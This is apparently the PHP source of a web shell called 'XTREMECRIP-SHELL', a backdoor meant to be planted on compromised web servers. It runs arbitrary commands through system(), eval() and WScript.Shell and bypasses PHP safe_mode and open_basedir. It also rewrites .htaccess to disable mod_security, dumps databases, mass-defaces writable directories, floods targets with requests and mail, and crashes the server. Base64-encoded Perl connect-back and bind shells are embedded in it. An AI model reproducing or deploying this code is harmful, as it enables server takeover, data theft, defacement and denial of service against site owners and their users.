$query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo "


'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory
"; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd
$et
"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|- |',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i '; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'


Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File

Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'

'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; } function printdrive(){ global $slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $adri=$tempdrive.":".$slash; $drivea=$drivea.''.$tempdrive.':'.$slash.' '; } } return $drivea; } if($_POST['nameren'] && $_POST['addressren']){ if(is_writable($_REQUEST['addressren'])){ rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !"); }else{alert("Permission Denied !");} } if($_GET['do']=="delete"){ if ($_GET['type']=="dir"){ if(is_writable($_REQUEST['address'])){ $dir=$_GET['address'].$_GET['filename']; deleteDirectory($dir); alert("Deleted Successful !"); }else{alert("Permission Denied !");} }elseif($_GET['type']=="file"){ if(is_writable($_GET['address'].$_GET['filename'])){ unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !"); }else{alert("Permission Denied !");} } } if($_POST['fedit'] && $_POST['namefe']){ if(is_writable($_REQUEST['address'])){ $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); fwrite($opensave,html_entity_decode($_POST['fedit'])); fclose($opensave);alert("File Saved Successful !"); }else{alert("Permission Denied !");} } if ($_POST['evalsource']){ eval($_POST['evalsource']); } if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'


'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

'.$end;exit;} if ($_GET['do']=="symlink"){ echo $head.'

SymLink With PHP
TO


SymLink With OS :
TO

'.$end;exit;} if ($_POST['ad1syp'] && $_POST['ad2syp']){ if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){ alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); }} if ($_POST['ad1syc'] && $_POST['ad2syc']){ if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){ alert("Symlink Worked !"); }else{alert("Symlink Not Worked !");} } if ($_GET['do']=="d0slocal"){ echo $head.'

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;} if ($_GET['dosthisserver']=="1"){ function dosserver(){ $junk=str_repeat("9999999999999999999999999999999999999999999 9999999",99999); for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } dosserver(); } if ($_GET['dosthisserver']=="2"){ function cx(){cx();} cx(); } if ($_GET['do']=="convert"){ $hash=null; if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ $hash=md5($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ $hash=sha1($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ $hash=crc32($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ $hash=base64_encode($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ $hash=base64_decode($_GET['stringtoh']); } echo $head.'

Convert

'.$end;exit;} if ($_GET['do']=="dump"){ echo $head.'

'; echo '

Backup Database

DB Type:
Server:
Username:
Password:
Data Base Name:

'.$end;exit;} if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if ($_GET['do']=="mail"){ echo $head.'

Address :

Subject :



Number For Send :

'.$end;exit;} if ($_POST['admail'] && $_POST['submail'] ){ for($mi=0;$miChmod
To
".$end;exit; } /* if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'])){ chdir($_GET['address']);}else{alert("Permission Denied !");} }} */ $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback=1){ $rr=str_replace($basep,"",getcwd()); $rr=str_replace("\\","/",$rr); $diropen=''.$parsef.''; }else{ $diropen=''.$parsef.''; } return $diropen; } if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']) {$ifget=$_POST['address'];} if($cwd==''){$cwd=getcwd();}$nowaddress=''; $ad=getcwd(); $hand=opendir("$ad"); $coi=0; $coi2=0; while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi++; $fil=$fil.'

'.$fileee.'

'.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DL Ren Del
' ;} else{ if ($coi2 %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi2++; $file=$file.'

'.openf($fileee).'

'.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDL Ren Del
' ;} } } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$fil.$file.'

'.$formg.'Command Execute :

'.$formg.'Change Dir :

'.$formg.'Create Dir :

'.$formg.'Create File :

'.$for - lol lol

"; $formg="
"; $nowaddress=''; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"] ["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} } $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB 30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1T QDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bO Jd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/ DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7v uf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wc U9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7 P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1n VjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFf BsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQ nG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkli gaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII='; $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAA BaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gn nzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036w OzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj /40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3s deeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1n b7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb +B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t 3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmC C'; $head=' XTREMECRIP-SHELL
Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
'; $end='

'.base64_decode("WFRSRU1FQ1JJUC1TSEVMTCBDT0RFRCBCWSBYVF JFTUVDUklQIEFORCBUSEUtSElUTUFO").'
'.base64_decode("VEVBTTokJCQkJFhUUkVNRUNSSVAuT1JHJCQkJ CQ=").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; function alert($text){ echo ""; } if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'


'.$end;exit; }else{alert("Permission Denied !");}} function sizee($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } if($_REQUEST['do']=='about'){ echo $head."

xtremeshell, xsl Security Research & Penetration Testing Team
Version 1.1
Last Update : 2010/10/10
Coded By : xtremecrip(the-hitmna)
Special Thanks( team xtremecrip.org )
Home Page : http'>xtremecrip Shell
Forum : http://www.xtremecrip.org


 SHELL BY XC0D3



".$end;exit; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} function download($fileadd,$finame){ $dlfilea=$fileadd.$finame; header("Content-Disposition: attachment; filename=" . $finame); header("Content-Type: application/download"); header("Content-Length: " . filesize($dlfilea)); flush(); $fp = fopen($$dlfilea, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'

To

'.$end;exit; } if ($_GET['byapache']=='ofms'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fse); }elseif ($_GET['byapache']=='bysap'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html'); fclose($fse); }elseif ($_GET['byapache']=='sfadf'){ $fse=fopen(getcwd().$slash."php.ini","w"); fwrite($fse,'safe_mode=OFF disable_functions=NONE'); fclose($fse); } if($_GET['do']=="apache"){ echo $head.$formg.$nowaddress.'


'.$end;exit; } if($_GET['do']=="dd0s"){ echo $head.$formg.$nowaddress.'

Address : Time :

'.$end;exit; } if($_GET['urldd0'] && $_GET['timedd0']){ for ($id=0;$$id<$_GET['timedd0'];$id++){ $fp=null; $contents=null; $fp=fopen($_GET['urldd0'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

Download Remote File!
Address :
Save To :

'.$end;exit; } function dirpe($addres){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { $dirdata[$idd]['filename']=$permdir; $idd++; } dirpe($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } function dirpmass($addres,$massname,$masssource){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { if ($fm=fopen($permdir.$slash.$massname,"w")){ fwrite($fm,$masssource); fclose($fm); $dirdata[$idd]['filename']=$permdir; } $idd++; } dirpmass($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } if($_GET['do']=="perm"){ echo $head.$formp.'

Find All Folder Writeable

'.$end;exit; } if ($_POST['affw']){ $arrfilelist=dirpe($_POST['affw']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.'
'.$end;exit; }} if($_GET['do']=="mass"){ echo $head.$formp.'

[Mass Deface]


'.$end;exit; } if ($_POST['mffw']){ $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssou rce']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.' '.$end;exit; }} if($_POST['adlr'] && $_POST['adsr']){ $url = $_POST['adlr']; $newfname = $_POST['adsr'] . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } alert("File Downloaded Success"); }else{alert("Can Not Open File");} if ($file) { fclose($file); } if ($newf) { fclose($newf); } } if($_GET['do']=="down" and $_GET['type']=='file'){ download($_GET['address'],$_GET['filename']);} if($_GET['do']=="down" and $_GET['type']=='dir'){ class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); function get_files_from_folder($directory, $put_into) { global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } $datedl=date("y-m-d"); get_files_from_folder($dlfolder,''); header("Content-Disposition: attachment; filename=" . $_GET['dirname']."- ".$datedl.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname']."-".$datedl.".zip"; $fd = fopen ($filename, "wb"); $out = fwrite ($fd, $zipfile -> file()); fclose ($fd); } if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZX JsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRw b3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdl OiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIls rXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgI yBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIF NPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKa WYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9z dCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI +JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNF UlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V 0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJ HByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygi bCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxp c3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNF UlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERP VVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV 4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF0 7JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZF UiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9 TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4 oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7IC RwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4 mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTEl FTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVE RFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } 